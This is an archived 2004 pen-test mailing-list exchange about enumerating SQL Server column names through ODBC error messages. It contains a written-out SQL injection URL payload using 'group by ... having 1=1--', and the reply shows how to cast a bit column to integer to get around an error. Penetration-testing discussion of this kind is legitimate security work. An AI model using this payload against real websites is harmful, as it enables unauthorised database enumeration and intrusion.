From: Thor (thor@hammerofgod.com)
Date: Wed May 12 2004 - 14:30:40 EDT
Try casting the column as integer first- SQL2000 will do this for you in a
standard query- you ODBC driver may not-
so, it would be "group by cast(sometable.column1 as integer)"
t
----- Original Message -----
From: "Chan Fook Sheng" <chanfooksheng@pacific.net.sg>
To: <pen-test@securityfocus.com>
Sent: Wednesday, May 12, 2004 3:31 AM
Subject: enumeration of SQL column names failed when a column is of type
"bit"
> Hi
>
> I am following David Litchfield excellent paper on SQL "Web App
> disassembly with ODBC Error Messages" on how to enumerate column names.
>
> The method appends "having 1=1--" and "group by" in the url
>
> Everything went well, but then if I have a table the contain a column of
> "bit" type, the method outlined in the paper will failed.
>
> i.e.
>
http://somesite/somepage.asp?id=1%20group%20by%20sometable.coulmn1,%20sometable.coulmn2%20having%201=1--
>
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Cannot group by a bit
column.
>
> Anyone aware of any other methods?
>
> fook sheng
>
>
> --------------------------------------------------------------------------
---- > Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off > any course! All of our class sizes are guaranteed to be 10 students or less > to facilitate one-on-one interaction with one of our expert instructors. > Attend a course taught by an expert instructor with years of in-the-field > pen testing experience in our state of the art hacking lab. Master the skills > of an Ethical Hacker to better assess the security of your organization. > Visit us at: > http://www.infosecinstitute.com/courses/ethical_hacking_training.html > -------------------------------------------------------------------------- ----- > > ------------------------------------------------------------------------------ Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off any course! All of our class sizes are guaranteed to be 10 students or less to facilitate one-on-one interaction with one of our expert instructors. Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. Master the skills of an Ethical Hacker to better assess the security of your organization. Visit us at: http://www.infosecinstitute.com/courses/ethical_hacking_training.html -------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:54 EDT